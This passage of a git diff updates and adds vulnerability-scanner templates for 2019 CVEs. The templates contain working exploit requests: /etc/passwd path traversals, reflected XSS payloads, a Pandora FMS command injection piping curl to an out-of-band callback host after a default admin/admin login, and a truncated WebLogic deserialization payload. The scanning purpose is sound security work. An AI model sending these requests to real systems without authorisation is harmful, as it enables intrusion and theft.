+    Xiaomi Mi WiFi R3G devices before 2.28.23-stable are susceptible to local file inclusion vulnerabilities via a misconfigured NGINX alias, as demonstrated by api-third-party/download/extdisks../etc/config/account. With this vulnerability, the attacker can bypass authentication.
+  reference:
+    - https://ultramangaia.github.io/blog/2019/Xiaomi-Series-Router-Command-Execution-Vulnerability.html
+    - https://github.com/UltramanGaia/Xiaomi_Mi_WiFi_R3G_Vulnerability_POC/blob/master/arbitrary_file_read_vulnerability.py
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-18371
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2019-18371
+    cwe-id: CWE-22
+  tags: cve2019,cve,lfi,router,mi,xiaomi
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/api-third-party/download/extdisks../etc/passwd"
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        regex:
+          - "root:.*:0:0:"
+
+      - type: status
+        status:
+          - 200
+
+# Enhanced by mp on 2022/06/17
diff --git a/cves/2019/CVE-2019-18393.yaml b/cves/2019/CVE-2019-18393.yaml
index 832ccd74bf..031dbfd448 100644
--- a/cves/2019/CVE-2019-18393.yaml
+++ b/cves/2019/CVE-2019-18393.yaml
@@ -1,12 +1,14 @@
 id: CVE-2019-18393
 
 info:
-  name: Openfire LFI
+  name: Ignite Realtime Openfire <4.42 - Local File Inclusion
   author: pikpikcu
   severity: medium
-  description: PluginServlet.java in Ignite Realtime Openfire through 4.4.2 does not ensure that retrieved files are located under the Openfire home directory, aka a directory traversal vulnerability.
+  description: Ignite Realtime Openfire through 4.4.2 is vulnerable to local file inclusion via PluginServlet.java. It does not ensure that retrieved files are located under the Openfire home directory.
   reference:
+    - https://github.com/igniterealtime/Openfire/pull/1498
     - https://swarm.ptsecurity.com/openfire-admin-console/
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-18393
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
     cvss-score: 5.3
@@ -30,3 +32,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/07/22
diff --git a/cves/2019/CVE-2019-18665.yaml b/cves/2019/CVE-2019-18665.yaml
new file mode 100644
index 0000000000..0af194d419
--- /dev/null
+++ b/cves/2019/CVE-2019-18665.yaml
@@ -0,0 +1,37 @@
+id: CVE-2019-18665
+
+info:
+  name: DOMOS 5.5 - Local File Inclusion
+  author: 0x_Akoko
+  severity: high
+  description: |
+    SECUDOS DOMOS before 5.6 allows local file inclusion via the log module.
+  reference:
+    - https://atomic111.github.io/article/secudos-domos-directory_traversal
+    - https://vuldb.com/?id.144804
+    - https://www.secudos.de/news-und-events/aktuelle-news/domos-release-5-6
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-18665
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2019-18665
+    cwe-id: CWE-22
+  tags: cve,cve2019,domos,lfi
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/page/sl_logdl?dcfct=DCMlog.download_log&dbkey%3Asyslog.rlog=/etc/passwd"
+
+    matchers-condition: and
+    matchers:
+
+      - type: regex
+        regex:
+          - "root:[x*]:0:0"
+
+      - type: status
+        status:
+          - 200
+
+# Enhanced by mp on 2022/07/08
diff --git a/cves/2019/CVE-2019-18818.yaml b/cves/2019/CVE-2019-18818.yaml
index 3de85d0087..72cb51e5e8 100644
--- a/cves/2019/CVE-2019-18818.yaml
+++ b/cves/2019/CVE-2019-18818.yaml
@@ -4,17 +4,18 @@ info:
   name: strapi CMS <3.0.0-beta.17.5 - Admin Password Reset
   author: idealphase
   severity: critical
-  description: "strapi CMS before 3.0.0-beta.17.5 allows admin password resets because it mishandles password resets within packages/strapi-admin/controllers/Auth.js and packages/strapi-plugin-users-permissions/controllers/Auth.js."
+  description: strapi CMS before 3.0.0-beta.17.5 allows admin password resets because it mishandles password resets within packages/strapi-admin/controllers/Auth.js and packages/strapi-plugin-users-permissions/controllers/Auth.js.
   reference:
     - https://github.com/advisories/GHSA-6xc2-mj39-q599
     - https://www.exploit-db.com/exploits/50239
     - https://nvd.nist.gov/vuln/detail/CVE-2019-18818
+    - https://github.com/strapi/strapi/releases/tag/v3.0.0-beta.17.5
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2019-18818
     cwe-id: CWE-640
-  tags: cve,cve2019,strapi,auth-bypass,intrusive
+  tags: cve2019,strapi,auth-bypass,intrusive,edb,cve
 
 requests:
   - raw:
diff --git a/cves/2019/CVE-2019-18922.yaml b/cves/2019/CVE-2019-18922.yaml
index 6b5f968910..48d53d59c7 100644
--- a/cves/2019/CVE-2019-18922.yaml
+++ b/cves/2019/CVE-2019-18922.yaml
@@ -1,19 +1,21 @@
 id: CVE-2019-18922
 
 info:
-  name: Allied Telesis AT-GS950/8 Directory Traversal
+  name: Allied Telesis AT-GS950/8 - Local File Inclusion
   author: 0x_Akoko
   severity: high
-  description: A Directory Traversal in the Web interface of the Allied Telesis AT-GS950/8 until Firmware AT-S107 V.1.1.3
+  description: |
+    Allied Telesis AT-GS950/8 until Firmware AT-S107 V.1.1.3 is susceptible to local file inclusion via its web interface.
   reference:
     - https://packetstormsecurity.com/files/155504/Allied-Telesis-AT-GS950-8-Directory-Traversal.html
-    - https://www.cvedetails.com/cve/CVE-2019-18922
+    - https://pastebin.com/dpEGKUGz
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-18922
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
     cve-id: CVE-2019-18922
     cwe-id: CWE-22
-  tags: cve,cve2019,allied,lfi
+  tags: allied,lfi,packetstorm,cve,cve2019
 
 requests:
   - method: GET
@@ -30,3 +32,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/06/17
diff --git a/cves/2019/CVE-2019-19134.yaml b/cves/2019/CVE-2019-19134.yaml
index 04b7171c4e..aed3907378 100644
--- a/cves/2019/CVE-2019-19134.yaml
+++ b/cves/2019/CVE-2019-19134.yaml
@@ -1,19 +1,22 @@
 id: CVE-2019-19134
 
 info:
-  name: Hero Maps Premium < 2.2.3 - Unauthenticated Reflected Cross-Site Scripting (XSS)
+  name: WordPress Hero Maps Premium <=2.2.1 - Cross-Site Scripting
   author: daffainfo
   severity: medium
-  description: The Hero Maps Premium plugin 2.2.1 and prior for WordPress is prone to unauthenticated XSS via the views/dashboard/index.php p parameter because it fails to sufficiently sanitize user-supplied input    -
-    https://wpscan.com/vulnerability/24b83ce5-e3b8-4262-b087-a2dfec014985
+  description: WordPress Hero Maps Premium plugin 2.2.1 and prior contains an unauthenticated reflected cross-site scripting vulnerability via the views/dashboard/index.php p parameter.
   reference:
     - https://wpscan.com/vulnerability/d179f7fe-e3e7-44b3-9bf8-aab2e90dbe01
+    - https://www.hooperlabs.xyz/disclosures/cve-2019-19134.php
+    - https://heroplugins.com/product/maps/
+    - https://heroplugins.com/changelogs/hmaps/changelog.txt
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-19134
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2019-19134
     cwe-id: CWE-79
-  tags: cve,cve2019,wordpress,xss,wp-plugin,maps
+  tags: wpscan,cve,cve2019,wordpress,xss,wp-plugin,maps
 
 requests:
   - method: GET
@@ -35,3 +38,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/08/31
diff --git a/cves/2019/CVE-2019-19368.yaml b/cves/2019/CVE-2019-19368.yaml
index 80f73d6090..40f3ae2243 100644
--- a/cves/2019/CVE-2019-19368.yaml
+++ b/cves/2019/CVE-2019-19368.yaml
@@ -1,19 +1,21 @@
 id: CVE-2019-19368
 
 info:
-  name: Rumpus FTP Web File Manager 8.2.9.1 XSS
+  name: Rumpus FTP Web File Manager 8.2.9.1 - Cross-Site Scripting
   author: madrobot
   severity: medium
-  description: A Reflected Cross Site Scripting was discovered in the Login page of Rumpus FTP Web File Manager 8.2.9.1. An attacker can exploit it by sending a crafted link to end users and can execute arbitrary
-    Javascripts
+  description: Rumpus FTP Web File Manager 8.2.9.1 contains a reflected cross-site scripting vulnerability via the Login page. An attacker can send a crafted link to end users and can execute arbitrary JavaScript.
   reference:
     - https://github.com/harshit-shukla/CVE-2019-19368/
+    - https://www.maxum.com/Rumpus/Download.html
+    - http://packetstormsecurity.com/files/155719/Rumpus-FTP-Web-File-Manager-8.2.9.1-Cross-Site-Scripting.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-19368
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2019-19368
     cwe-id: CWE-79
-  tags: cve,cve2019,xss,ftp
+  tags: xss,ftp,packetstorm,cve,cve2019
 
 requests:
   - method: GET
@@ -28,3 +30,5 @@ requests:
         words:
           - "value=''><sVg/OnLoAD=alert`1337`//'>"
         part: body
+
+# Enhanced by mp on 2022/08/31
diff --git a/cves/2019/CVE-2019-19781.yaml b/cves/2019/CVE-2019-19781.yaml
index af21225a19..96f5859012 100644
--- a/cves/2019/CVE-2019-19781.yaml
+++ b/cves/2019/CVE-2019-19781.yaml
@@ -8,12 +8,13 @@ info:
   reference:
     - https://support.citrix.com/article/CTX267027
     - https://nvd.nist.gov/vuln/detail/CVE-2019-19781
+    - https://www.kb.cert.org/vuls/id/619785
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2019-19781
     cwe-id: CWE-22
-  tags: cve,cve2019,citrix,lfi
+  tags: cve,cve2019,citrix,lfi,kev
 
 requests:
   - method: GET
diff --git a/cves/2019/CVE-2019-19824.yaml b/cves/2019/CVE-2019-19824.yaml
index 9f3cbaa285..fd13474731 100644
--- a/cves/2019/CVE-2019-19824.yaml
+++ b/cves/2019/CVE-2019-19824.yaml
@@ -1,16 +1,16 @@
 id: CVE-2019-19824
 
 info:
-  name: TOTOLINK  - Remote Code Execution
+  name: TOTOLINK Realtek SD Routers - Remote Command Injection
   author: gy741
   severity: high
-  description: On certain TOTOLINK Realtek SDK based routers, an authenticated attacker may execute arbitrary OS commands via the sysCmd parameter to the boafrm/formSysCmd URI, even if the GUI (syscmd.htm) is not
-    available. This allows for full control over the device's internals. This affects A3002RU through 2.0.0, A702R through 2.1.3, N301RT through 2.1.6, N302R through 3.4.0, N300RT through 3.4.0, N200RE through 4.0.0,
-    N150RT through 3.4.0, and N100RE through 3.4.0.
+  description: |
+    TOTOLINK Realtek SDK based routers may allow an authenticated attacker to execute arbitrary OS commands via the sysCmd parameter to the boafrm/formSysCmd URI, even if the GUI (syscmd.htm) is not available. This allows for full control over the device's internals. This affects A3002RU through 2.0.0, A702R through 2.1.3, N301RT through 2.1.6, N302R through 3.4.0, N300RT through 3.4.0, N200RE through 4.0.0, N150RT through 3.4.0, and N100RE through 3.4.0.
   reference:
     - https://sploit.tech/2019/12/16/Realtek-TOTOLINK.html
-    - https://nvd.nist.gov/vuln/detail/CVE-2019-19824
     - https://cybersecurity.att.com/blogs/labs-research/att-alien-labs-finds-new-golang-malwarebotenago-targeting-millions-of-routers-and-iot-devices-with-more-than-30-exploits
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-19824
+    - https://sploit.tech
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 8.8
@@ -33,3 +33,5 @@ requests:
         part: interactsh_protocol  # Confirms the HTTP Interaction
         words:
           - "http"
+
+# Enhanced by mp on 2022/06/17
diff --git a/cves/2019/CVE-2019-19908.yaml b/cves/2019/CVE-2019-19908.yaml
index 6a278ed7a0..58f0f0bb2b 100644
--- a/cves/2019/CVE-2019-19908.yaml
+++ b/cves/2019/CVE-2019-19908.yaml
@@ -1,12 +1,15 @@
 id: CVE-2019-19908
 
 info:
-  name: phpMyChat-Plus - Cross-Site Scripting
+  name: phpMyChat-Plus 1.98 - Cross-Site Scripting
   author: madrobot
   severity: medium
-  description: phpMyChat-Plus 1.98 is vulnerable to reflected cross-site scripting (XSS) via JavaScript injection into the password reset URL. In the URL, the pmc_username parameter to pass_reset.php is vulnerable.
+  description: phpMyChat-Plus 1.98 contains a cross-site scripting vulnerability via pmc_username parameter of pass_reset.php in password reset URL.
   reference:
     - https://cinzinga.github.io/CVE-2019-19908/
+    - http://ciprianmp.com/
+    - https://sourceforge.net/projects/phpmychat/
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-19908
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -27,3 +30,5 @@ requests:
         words:
           - "<script>alert(1337)</script>"
         part: body
+
+# Enhanced by mp on 2022/08/31
diff --git a/cves/2019/CVE-2019-19985.yaml b/cves/2019/CVE-2019-19985.yaml
index ab25c58a3d..c7642d2f86 100644
--- a/cves/2019/CVE-2019-19985.yaml
+++ b/cves/2019/CVE-2019-19985.yaml
@@ -7,12 +7,15 @@ info:
   description: The WordPress plugin Email Subscribers & Newsletters before 4.2.3 contains a flaw that allows unauthenticated file download and user information disclosure.
   reference:
     - https://www.exploit-db.com/exploits/48698
+    - https://wpvulndb.com/vulnerabilities/9946
+    - https://www.wordfence.com/blog/2019/11/multiple-vulnerabilities-patched-in-email-subscribers-newsletters-plugin/
+    - http://packetstormsecurity.com/files/158563/WordPress-Email-Subscribers-And-Newsletters-4.2.2-File-Disclosure.html
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
     cvss-score: 5.3
     cve-id: CVE-2019-19985
     cwe-id: CWE-862
-  tags: cve,cve2019,wordpress,wp-plugin
+  tags: cve2019,wordpress,wp-plugin,edb,packetstorm,cve
 
 requests:
   - method: GET
diff --git a/cves/2019/CVE-2019-20085.yaml b/cves/2019/CVE-2019-20085.yaml
index ec39fc883a..5602b9547d 100644
--- a/cves/2019/CVE-2019-20085.yaml
+++ b/cves/2019/CVE-2019-20085.yaml
@@ -1,19 +1,22 @@
 id: CVE-2019-20085
 
 info:
-  name: TVT NVMS 1000 - Directory Traversal
+  name: TVT NVMS 1000 - Local File Inclusion
   author: daffainfo
   severity: high
-  description: TVT NVMS-1000 devices allow GET /.. Directory Traversal
+  description: |
+    TVT NVMS-1000 devices allow GET /.. local file inclusion attacks.
   reference:
-    - https://nvd.nist.gov/vuln/detail/CVE-2019-20085
     - https://www.exploit-db.com/exploits/48311
+    - https://www.exploit-db.com/exploits/47774
+    - http://packetstormsecurity.com/files/157196/TVT-NVMS-1000-Directory-Traversal.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-20085
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
     cve-id: CVE-2019-20085
     cwe-id: CWE-22
-  tags: cve,cve2019,iot,lfi
+  tags: cve,cve2019,iot,lfi,kev,edb,packetstorm
 
 requests:
   - method: GET
@@ -23,9 +26,12 @@ requests:
     matchers-condition: and
     matchers:
       - type: regex
+        part: body
         regex:
           - "\\[(font|extension|file)s\\]"
-        part: body
+
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/06/10
diff --git a/cves/2019/CVE-2019-20141.yaml b/cves/2019/CVE-2019-20141.yaml
index 9e3ef70432..d70eda17e9 100644
--- a/cves/2019/CVE-2019-20141.yaml
+++ b/cves/2019/CVE-2019-20141.yaml
@@ -1,12 +1,15 @@
 id: CVE-2019-20141
 
 info:
-  name: Neon Dashboard - Cross-Site Scripting
+  name: WordPress Laborator Neon Theme 2.0 - Cross-Site Scripting
   author: knassar702
   severity: medium
-  description: An XSS issue was discovered in the Laborator Neon theme 2.0 for WordPress via the data/autosuggest-remote.php q parameter.
+  description: WordPress Laborator Neon theme 2.0 contains a cross-site scripting vulnerability via the data/autosuggest-remote.php q parameter.
   reference:
     - https://knassar7o2.blogspot.com/2019/12/neon-dashboard-cve-2019-20141.html
+    - https://knassar7o2.blogspot.com/2019/12/neon-dashboard-xss-reflected.html
+    - https://knassar702.github.io/cve/neon/
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-20141
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -31,3 +34,5 @@ requests:
         words:
           - "text/html"
         part: header
+
+# Enhanced by mp on 2022/08/31
diff --git a/cves/2019/CVE-2019-20183.yaml b/cves/2019/CVE-2019-20183.yaml
index 104cc74715..15727a44ac 100644
--- a/cves/2019/CVE-2019-20183.yaml
+++ b/cves/2019/CVE-2019-20183.yaml
@@ -1,18 +1,21 @@
 id: CVE-2019-20183
 
 info:
-  name: Simple Employee Records System 1.0 arbitrary file upload
+  name: Simple Employee Records System 1.0 - Unrestricted File Upload
   author: pikpikcu
   severity: high
-  description: Simple Employee Records System 1.0 contains an arbitrary file upload due to client-side validation of file extensions. This can be used to upload executable code to the server to obtain access or RCE.
+  description: |
+    Simple Employee Records System 1.0 contains an arbitrary file upload vulnerability due to client-side validation of file extensions. This can be used to upload executable code to the server to obtain access or perform remote command execution.
   reference:
     - https://www.exploit-db.com/exploits/49596
+    - https://medium.com/@Pablo0xSantiago/cve-2019-20183-employee-records-system-bypass-file-upload-to-rce-ea2653660b34
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-20183
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 7.2
     cve-id: CVE-2019-20183
     cwe-id: CWE-434
-  tags: rce,intrusive,cve,upload,cve2019
+  tags: edb,cve,cve2019,rce,intrusive,fileupload
 
 requests:
   - raw:
@@ -47,7 +50,9 @@ requests:
 
     matchers:
       - type: regex
+        part: body
         regex:
           - "root:.*:0:0:"
         condition: and
-        part: body
+
+# Enhanced by mp on 2022/06/17
diff --git a/cves/2019/CVE-2019-20210.yaml b/cves/2019/CVE-2019-20210.yaml
new file mode 100644
index 0000000000..b3d521aaa9
--- /dev/null
+++ b/cves/2019/CVE-2019-20210.yaml
@@ -0,0 +1,44 @@
+id: CVE-2019-20210
+
+info:
+  name: WordPress CTHthemes - Cross-Site Scripting
+  author: edoardottt
+  severity: medium
+  description: |
+    WordPress CTHthemes CityBook before 2.3.4, TownHub before 1.0.6, and EasyBook before 1.2.2 themes contain reflected cross-site scripting vulnerabilities via a search query.
+  reference:
+    - https://wpscan.com/vulnerability/10013
+    - https://wpvulndb.com/vulnerabilities/10018
+    - https://cxsecurity.com/issue/WLB-2019120112
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-20210
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2019-20210
+    cwe-id: CWE-79
+  tags: wp-theme,wpscan,cve,cve2019,wordpress,citybook,xss
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/?search_term=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&location_search=&nearby=off&address_lat=&address_lng=&distance=10&lcats%5B%5D="
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "</script><script>alert(document.domain)</script>"
+          - "/wp-content/themes/citybook"
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200
+
+# Enhanced by mp on 2022/08/31
diff --git a/cves/2019/CVE-2019-20224.yaml b/cves/2019/CVE-2019-20224.yaml
new file mode 100644
index 0000000000..1564fd5f33
--- /dev/null
+++ b/cves/2019/CVE-2019-20224.yaml
@@ -0,0 +1,53 @@
+id: CVE-2019-20224
+
+info:
+  name: Pandora FMS 7.0NG - Remote Command Injection
+  author: ritikchaddha
+  severity: high
+  description: |
+    Pandora FMS 7.0NG allows remote authenticated users to execute arbitrary OS commands via shell metacharacters in the ip_src parameter in an index.php?operation/netflow/nf_live_view request.
+  reference:
+    - https://shells.systems/pandorafms-v7-0ng-authenticated-remote-code-execution-cve-2019-20224/
+    - https://gist.github.com/mhaskar/2153d66a0928492d76b799ba13b9e3f9
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-20224
+    - https://drive.google.com/file/d/1DkWR5MylzeNr20jmHXTaAIJmf3YN-lnO/view
+  remediation: This issue has been fixed in Pandora FMS 7.0 NG 742.
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 8.8
+    cve-id: CVE-2019-20224
+    cwe-id: CWE-78
+  tags: pandorafms,rce,cve,cve2019,authenticated,oast
+
+requests:
+  - raw:
+      - |
+        POST /pandora_console/index.php?login=1 HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        nick=admin&pass=admin&login_button=Login
+
+      - |
+        POST /pandora_console/index.php?sec=netf&sec2=operation/netflow/nf_live_view&pure=0 HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        date=0&time=0&period=0&interval_length=0&chart_type=netflow_area&max_aggregates=1&address_resolution=0&name=0&assign_group=0&filter_type=0&filter_id=0&filter_selected=0&ip_dst=0&ip_src=%22%3Bcurl+{{interactsh-url}}+%23&draw_button=Draw
+
+    cookie-reuse: true
+    redirects: true
+    max-redirects: 2
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol
+        name: http
+        words:
+          - "http"
+
+      - type: status
+        status:
+          - 200
+
+# Enhanced by mp on 2022/06/17
diff --git a/cves/2019/CVE-2019-20933.yaml b/cves/2019/CVE-2019-20933.yaml
new file mode 100644
index 0000000000..d1a89615a9
--- /dev/null
+++ b/cves/2019/CVE-2019-20933.yaml
@@ -0,0 +1,39 @@
+id: CVE-2019-20933
+
+info:
+  name: Authentication Bypass InfluxDB
+  author: pussycat0x,c-sh0
+  severity: critical
+  description: InfluxDB before 1.7.6 has an authentication bypass vulnerability in the authenticate function in services/httpd/handler.go because a JWT token may have an empty SharedSecret (aka shared secret).
+  reference:
+    - https://github.com/LorenzoTullini/InfluxDB-Exploit-CVE-2019-20933
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-20933
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20933
+    - https://github.com/influxdata/influxdb/compare/v1.7.5...v1.7.6
+  remediation: Update Influxdb to version 1.6.7~rc0-1 or higher.
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2019-20933
+    cwe-id: CWE-287
+  metadata:
+    shodan-dork: InfluxDB
+    verified: "true"
+  tags: unauth,db,influxdb,misconfig
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/query?db=db&q=SHOW%20DATABASES"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"results":'
+          - '"name":"databases"'
+        condition: and
+
+      - type: status
+        status:
+          - 200
diff --git a/cves/2019/CVE-2019-2578.yaml b/cves/2019/CVE-2019-2578.yaml
index 758fb676ca..304aef45af 100644
--- a/cves/2019/CVE-2019-2578.yaml
+++ b/cves/2019/CVE-2019-2578.yaml
@@ -9,6 +9,7 @@ info:
     - https://www.oracle.com/security-alerts/cpuapr2019.html
     - https://outpost24.com/blog/Vulnerabilities-discovered-in-Oracle-WebCenter-Sites
     - https://nvd.nist.gov/vuln/detail/CVE-2019-2578
+    - http://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
     cvss-score: 8.6
diff --git a/cves/2019/CVE-2019-2579.yaml b/cves/2019/CVE-2019-2579.yaml
index 55aa825005..f54804eb17 100644
--- a/cves/2019/CVE-2019-2579.yaml
+++ b/cves/2019/CVE-2019-2579.yaml
@@ -9,6 +9,7 @@ info:
     - https://outpost24.com/blog/Vulnerabilities-discovered-in-Oracle-WebCenter-Sites
     - https://github.com/Leovalcante/wcs_scanner
     - https://nvd.nist.gov/vuln/detail/CVE-2019-2579
+    - http://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
     cvss-score: 4.3
diff --git a/cves/2019/CVE-2019-2616.yaml b/cves/2019/CVE-2019-2616.yaml
index b53b753913..3197c75650 100644
--- a/cves/2019/CVE-2019-2616.yaml
+++ b/cves/2019/CVE-2019-2616.yaml
@@ -1,18 +1,19 @@
 id: CVE-2019-2616
 
 info:
-  name: XXE in Oracle Business Intelligence and XML Publisher
+  name: Oracle Business Intelligence/XML Publisher - XML External Entity Injection
   author: pdteam
   severity: high
-  description: Oracle Business Intelligence / XML Publisher 11.1.1.9.0 / 12.2.1.3.0 / 12.2.1.4.0 - XML External Entity Injection
+  description: Oracle Business Intelligence and XML Publisher 11.1.1.9.0 / 12.2.1.3.0 / 12.2.1.4.0 are vulnerable to an XML external entity injection attack.
   reference:
-    - https://nvd.nist.gov/vuln/detail/CVE-2019-2616
     - https://www.exploit-db.com/exploits/46729
+    - http://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2019-2616
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
     cvss-score: 7.2
     cve-id: CVE-2019-2616
-  tags: cve,cve2019,oracle,xxe,oast
+  tags: cve,cve2019,oracle,xxe,oast,kev,edb
 
 requests:
   - raw:
@@ -28,4 +29,6 @@ requests:
       - type: word
         part: interactsh_protocol # Confirms the HTTP Interaction
         words:
-          - "http"
\ No newline at end of file
+          - "http"
+
+# Enhanced by mp on 2022/07/08
diff --git a/cves/2019/CVE-2019-2725.yaml b/cves/2019/CVE-2019-2725.yaml
index 03397b6412..9e912928f1 100644
--- a/cves/2019/CVE-2019-2725.yaml
+++ b/cves/2019/CVE-2019-2725.yaml
@@ -12,35 +12,46 @@ info:
     - https://www.oracle.com/security-alerts/cpujan2020.html
     - https://nvd.nist.gov/vuln/detail/CVE-2019-2725
   classification:
-    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2019-2725
     cwe-id: CWE-74
-  tags: cve,cve2019,oracle,weblogic,rce
+  tags: kev,edb,cve,cve2019,oracle,weblogic,rce
 
 requests:
-  - method: POST
-    path:
-      - "{{BaseURL}}/_async/AsyncResponseService"
-    headers:
-      Content-Type: application/soap;  charset="utf-8"
-    body: >-
-      <?xml version="1.0" encoding="UTF-8" ?>
-      <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
-      xmlns:ads="http://www.w3.org/2005/08/addressing">
-        <soapenv:Header></soapenv:Header>
-        <soapenv:Body></soapenv:Body>
-      </soapenv:Envelope>
+  - raw:
+      - |
+        POST /wls-wsat/CoordinatorPortType HTTP/1.1
+        Host: {{Hostname}}
+        Accept-Encoding: gzip, deflate
+        Accept: */*
+        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
+        Content-Type: text/xml
+        cmd: id
+
+        <?xml version="1.0" encoding="utf-8" ?><soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService"><soapenv:Header><wsa:Action/><wsa:RelatesTo/><asy:onAsyncDelivery/><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><class><string>oracle.toplink.internal.sessions.UnitOfWorkChangeSet</string><void><array class="byte" length="5010"><void index="0"><byte>-84</byte></void><void index="1"><byte>-19</byte></void><void index="2"><byte>0</byte></void><void index="3"><byte>5</byte></void><void index="4"><byte>115</byte></void><void index="5"><byte>114</byte></void><void index="6"><byte>0</byte></void><void index="7"><byte>23</byte></void><void index="8"><byte>106</byte></void><void index="9"><byte>97</byte></void><void index="10"><byte>118</byte></void><void index="11"><byte>97</byte></void><void index="12"><byte>46</byte></void><void index="13"><byte>117</byte></void><void index="14"><byte>116</byte></void><void index="15"><byte>105</byte></void><void index="16"><byte>108</byte></void><void index="17"><byte>46</byte></void><void index="18"><byte>76</byte></void><void index="19"><byte>105</byte></void><void index="20"><byte>110</byte></void><void index="21"><byte>107</byte></void><void index="22"><byte>101</byte></void><void index="23"><byte>100</byte></void><void index="24"><byte>72</byte></void><void index="25"><byte>97</byte></void><void index="26"><byte>115</byte></void><void index="27"><byte>104</byte></void><void index="28"><byte>83</byte></void><void index="29"><byte>101</byte></void><void index="30"><byte>116</byte></void><void index="31"><byte>-40</byte></void><void index="32"><byte>108</byte></void><void index="33"><byte>-41</byte></void><void index="34"><byte>90</byte></void><void index="35"><byte>-107</byte></void><void 